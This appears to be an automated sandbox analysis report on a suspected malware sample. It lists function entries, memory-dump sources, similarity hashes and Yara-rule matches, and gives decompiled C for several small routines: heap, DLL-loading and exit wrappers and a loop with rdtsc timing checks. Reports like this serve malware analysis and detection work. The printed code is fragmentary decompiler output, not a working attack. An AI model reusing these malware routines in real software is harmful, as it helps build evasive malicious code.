                                        • API String ID: 2994545307-0
                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0079FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0079FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0079FEA0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                        • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                        • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                        • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0079FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 007A07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004088E0 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E004088E0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E30(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407040( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A100( &_v284, 0x104);
						E0041A770( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413E00(E00413DA0(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t48 =  &_v840;
						_t33 = E00407070( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070F0(_t48, _t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                        0x004088eb
                                        0x004088f3
                                        0x004088f5
                                        0x004088fa
                                        0x004088ff
                                        0x00408912
                                        0x00408917
                                        0x00408920
                                        0x0040892c
                                        0x0040893f
                                        0x00408944
                                        0x00408947
                                        0x00408950
                                        0x00408962
                                        0x00408967
                                        0x0040896c
                                        0x00000000
                                        0x00000000
                                        0x0040896e
                                        0x00408972
                                        0x00000000
                                        0x00000000
                                        0x00408974
                                        0x00000000
                                        0x00408972
                                        0x00408976
                                        0x00408979
                                        0x0040897f
                                        0x00408981
                                        0x00408981
                                        0x0040898c
                                        0x00408991
                                        0x00408994
                                        0x004089a1
                                        0x004089ac
                                        0x004089ae
                                        0x004089b4
                                        0x004089b8
                                        0x004089bb
                                        0x004089bb
                                        0x004089c2
                                        0x004089c5
                                        0x004089ca
                                        0x004089d7
                                        0x00408906
                                        0x00408906
                                        0x00408906

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                        • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                        • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                        • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004188F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 27%
                                        			E004188F8(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t11;
				void* _t16;

				asm("adc [ebp-0x1], esp");
				asm("jecxz 0xffffffd3");
				 *[es:esi+0x55]();
				_t8 = _a4;
				_t3 = _t8 + 0xc74; // 0xc74
				E004191F0(_t16, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t11;
			}





                                        0x004188f8
                                        0x004188fb
                                        0x004188fd
                                        0x00418903
                                        0x0041890f
                                        0x00418917
                                        0x0041892d
                                        0x00418931

                                        APIs
                                        • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                        • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateFree
                                        • String ID: F5A
                                        • API String ID: 2488874121-683449296
                                        • Opcode ID: dee89f4081fafeeb5ca6e57f35365c4982f2260cb14297735c1efa90eebcb25d
                                        • Instruction ID: 65d6eb9398804ecb14b0f15041d824e748e08467b9100f0756e404fbd5f3b5da
                                        • Opcode Fuzzy Hash: dee89f4081fafeeb5ca6e57f35365c4982f2260cb14297735c1efa90eebcb25d
                                        • Instruction Fuzzy Hash: 41F069B5200208ABDB14EFA9DC49EEB77A8FF88314F11855AFD0957202C631E919CBB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004188C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 11 4188c0-4188f1 call 4191f0 RtlAllocateHeap
                                        C-Code - Quality: 100%
                                        			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                        0x004188d7
                                        0x004188e2
                                        0x004188ed
                                        0x004188f1

                                        APIs
                                        • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID: F5A
                                        • API String ID: 1279760036-683449296
                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                        • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                        • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00407290 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 210 407290-4072da call 41a150 call 41ad30 call 409b50 call 413e60 219 4072dc-4072ee PostThreadMessageW 210->219 220 40730e-407312 210->220 221 4072f0-40730a call 4092b0 219->221 222 40730d 219->222 221->222 222->220
                                        C-Code - Quality: 82%
                                        			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A150( &_v67, 0, 0x3f);
				E0041AD30( &_v68, 3);
				_t12 = E00409B50(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E60(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092B0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                        0x00407290
                                        0x0040729f
                                        0x004072a3
                                        0x004072ae
                                        0x004072be
                                        0x004072ce
                                        0x004072d3
                                        0x004072da
                                        0x004072dd
                                        0x004072ea
                                        0x004072ec
                                        0x004072ee
                                        0x0040730b
                                        0x0040730b
                                        0x00000000
                                        0x0040730d
                                        0x00407312

                                        APIs
                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                        • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                        • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                        • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409B44 Relevance: 1.5, APIs: 1, Instructions: 39libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 246 409b44-409b4a 247 409ba7-409bae 246->247 248 409b4c-409b79 call 41af80 246->248 250 409bb0-409bc4 LdrLoadDll 247->250 251 409bc7-409bca 247->251 253 409b7b-409b7e 248->253 254 409b7f-409b8d call 41b3a0 248->254 250->251 257 409b9d-409bae call 419730 254->257 258 409b8f-409b9a call 41b620 254->258 257->250 257->251 258->257
                                        C-Code - Quality: 81%
                                        			E00409B44(signed int __eax, void* __ecx, void* __esi, void* _a1, intOrPtr _a4, void* _a8) {
				struct _EXCEPTION_RECORD _v8;
				struct _OBJDIR_INFORMATION _v12;
				char _v16;
				char _v540;
				signed int _t15;
				void* _t20;
				signed int _t22;
				void* _t38;
				void* _t41;
				void* _t42;

				_t15 = __eax;
				asm("fst dword [esi]");
				_t1 = __ecx - 0x7e;
				 *_t1 =  *(__ecx - 0x7e) ^ __eax;
				if( *_t1 >= 0) {
					L7:
					asm("les eax, [ecx+ecx*4]");
					asm("hlt");
					__eflags = _t15;
					if(_t15 == 0) {
						LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
						_t15 = _v12;
					}
					return _t15;
				} else {
					_push(0x55cc1212);
					_v12 =  &_v540;
					_t20 = E0041AF80( &_v16, 0x104, _a4);
					_t41 = _t38 - 0x214 + 0xc;
					if(_t20 != 0) {
						_t22 = E0041B3A0(__eflags, _v8);
						_t42 = _t41 + 4;
						__eflags = _t22;
						if(_t22 != 0) {
							E0041B620( &_v12, 0);
							_t42 = _t42 + 8;
						}
						_t15 = E00419730(_v8);
						goto L7;
					} else {
						return _t20;
					}
				}
			}













                                        0x00409b44
                                        0x00409b45
                                        0x00409b47
                                        0x00409b47
                                        0x00409b4a
                                        0x00409ba7
                                        0x00409ba7
                                        0x00409bab
                                        0x00409bac
                                        0x00409bae
                                        0x00409bc2
                                        0x00409bc4
                                        0x00409bc4
                                        0x00409bca
                                        0x00409b4c
                                        0x00409b4c
                                        0x00409b6c
                                        0x00409b6f
                                        0x00409b74
                                        0x00409b79
                                        0x00409b83
                                        0x00409b88
                                        0x00409b8b
                                        0x00409b8d
                                        0x00409b95
                                        0x00409b9a
                                        0x00409b9a
                                        0x00409ba1
                                        0x00000000
                                        0x00409b7b
                                        0x00409b7e
                                        0x00409b7e
                                        0x00409b79

                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: fb3e2ec86a07fa4a9df8c929f341deec691628f630106901700f471316d218ac
                                        • Instruction ID: 7751f4f382c43c6d9ad6b1fc7e7a273abd06166c5d837339ae3e95d1a91cb70a
                                        • Opcode Fuzzy Hash: fb3e2ec86a07fa4a9df8c929f341deec691628f630106901700f471316d218ac
                                        • Instruction Fuzzy Hash: 9BF0C87594010DABDF10DAD0D841FD9B374EB1431CF1041DDED58AB141E670AE59CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00418900 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 266 418900-418916 267 41891c-418931 RtlFreeHeap 266->267 268 418917 call 4191f0 266->268 268->267
                                        C-Code - Quality: 100%
                                        			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                        0x0041890f
                                        0x00418917
                                        0x0041892d
                                        0x00418931

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                        • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                        • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00418A60 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 269 418a60-418a94 call 4191f0 LookupPrivilegeValueW
                                        C-Code - Quality: 100%
                                        			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                        0x00418a7a
                                        0x00418a90
                                        0x00418a94

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                        • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                        • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00418932 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 272 418932-418959 273 41895f-41896c ExitProcess 272->273 274 41895a call 4191f0 272->274 274->273
                                        C-Code - Quality: 21%
                                        			E00418932(int _a4) {
				intOrPtr _v0;
				void* _t14;

				_pop(_t18);
				asm("outsb");
				asm("adc al, 0xcd");
				asm("popfd");
				asm("repe cmp dword [ecx+0x55], 0x458bec8b");
				_t6 = _v0;
				E004191F0(_t14, _v0, _v0 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
				ExitProcess(_a4);
			}





                                        0x00418936
                                        0x00418937
                                        0x00418938
                                        0x0041893b
                                        0x0041893d
                                        0x00418943
                                        0x0041895a
                                        0x00418968

                                        APIs
                                        • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418968
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: 237a36f1572393e2cb50b611db30983380dcabf5a474b3bf0914a27545b4b409
                                        • Instruction ID: f0714cae740e9df41672cb9fb29fe2a672108dc6e5a31df97e34d93455d9e5ca
                                        • Opcode Fuzzy Hash: 237a36f1572393e2cb50b611db30983380dcabf5a474b3bf0914a27545b4b409
                                        • Instruction Fuzzy Hash: 07E026341181416EC710DF788DC2EC73BA8AF45304F1840ACF8451B203C534E64AC7A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00418940 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00418940(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                        0x00418943
                                        0x0041895a
                                        0x00418968

                                        APIs
                                        • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418968
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                        • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                        • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 007A0060 Relevance: .0, Instructions: 6COMMON
                                        Download Yara Rule
